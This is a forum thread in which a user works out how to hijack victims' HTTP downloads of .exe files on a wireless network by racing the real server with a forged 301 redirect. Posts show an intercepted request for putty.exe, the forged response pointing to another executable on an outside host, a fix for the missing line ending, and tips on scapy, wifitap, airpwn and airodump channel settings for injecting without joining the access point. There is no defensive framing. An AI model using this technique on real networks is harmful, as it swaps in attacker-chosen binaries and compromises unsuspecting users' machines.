Results 1 to 7 of 7

Thread: replacing .exe on a broadcast network

Hybrid View

  1. #1
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default replacing .exe on a broadcast network

    does anyone have any knowledge regarding replacing .exe file request on a broadcast network by exploiting a race condition... from what i understand at the moment one can sniff network traffic and on finding the "content-type:application" as a request respond to it with his own binary file,,, i think this would be even more cool than using ettercap filters and injecting code on the fly into an html page....

    if this is possible it can also lead to a whole new kind of injection attack in 802.11 network where an attacker can send data to the victim with out even being associated to the AP.

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default

    I believe this is called header injection.


    h**p://rturf.net/documentum/?View=entry&EntryID=272

    Another

    h**p://i8jesus.com/?p=18

  3. #3
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    Thanks a lot,,, it looks like HTTP 301 response is the best thing to do i have even seen an ettercap filter doing the same... will try to implement this using scapy on a wifi network,,, now must sit and start reading up on TCP to understand how the sequence number and ack numbers works and how the checksum is calculated...


    there is another way of accomplishing this,,, we can write a customised tcp stack which should race and respond to the GET request,, but the problem is this might become too complicated since i am trying to do using packet injection for a 802.11 network with out being associated to the AP.& i dunno how to handle and send executable files in packets... although i would like to learn about it anybody who could put some light on this topic or point me to some interesting article would be great... any suggestions or alternative way of doing this will also be greatly appreciated.

  4. #4
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Quote Originally Posted by Cryptid View Post
    there is another way of accomplishing this,,, we can write a customised tcp stack which should race and respond to the GET request,, but the problem is this might become too complicated since i am trying to do using packet injection for a 802.11 network with out being associated to the AP.& i dunno how to handle and send executable files in packets... although i would like to learn about it anybody who could put some light on this topic or point me to some interesting article would be great... any suggestions or alternative way of doing this will also be greatly appreciated.
    Wifitap, which uses scapy, might have some keys to the puzzle.
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    alright i have acheived some progress but im stuck again

    when a get request is being made say
    Code:
    GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1
    Host: the.earth.li
    i am repling back with a 301 response as such

    Code:
    HTTP/1.1 301 Moved Permanently
    Location: http://spool.metasploit.com/releases/framework-3.2.exe
    but the resultant is turning out to be a request made to

    Code:
    /releases/framework-3.2.exerth.li/~sgtatham/putty/latest/x86/putty.exe
    can anyone point me out to what i am doing wrong.

  6. #6
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    What tool are you using to do this?

    One thing Mister_X kindly shedded on light on was that airpwn _should_ actually be able to do this out of the box. Unfortunately, I've neve got airpwn to work right with mac80211 (even though it's "supported"). I'll try a test with my rt73 card soon and see if it will work in this scenario.
    dd if=/dev/swc666 of=/dev/wyze

  7. #7
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    the problem was the 301 response had to end with a \r\n which was missing, therefore the problem occured now its working but there is another problem the race conditon is effectively being exploited only the first time since the first response being generated is inducing some amount of latency in the program all the other get request are being retrieved from a buffer which are already being serviced by the authentic source therefore no more race condition exists because the program becomes slow and looses the race... any help with the program will be appreciated greatly

    at the moment the only solution i think to the problem is that somehow flush the buffer and start the sniffer again... or somehow get the sniffer to stop sniffing when the program is injecting the packet.


    by the way i am using scapy.


    even i faced the same problem with airpwn for sometime but later on figured out that running airodump using the "-c" on the same channel as the victime network gets airpwn to correctly inject the data.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •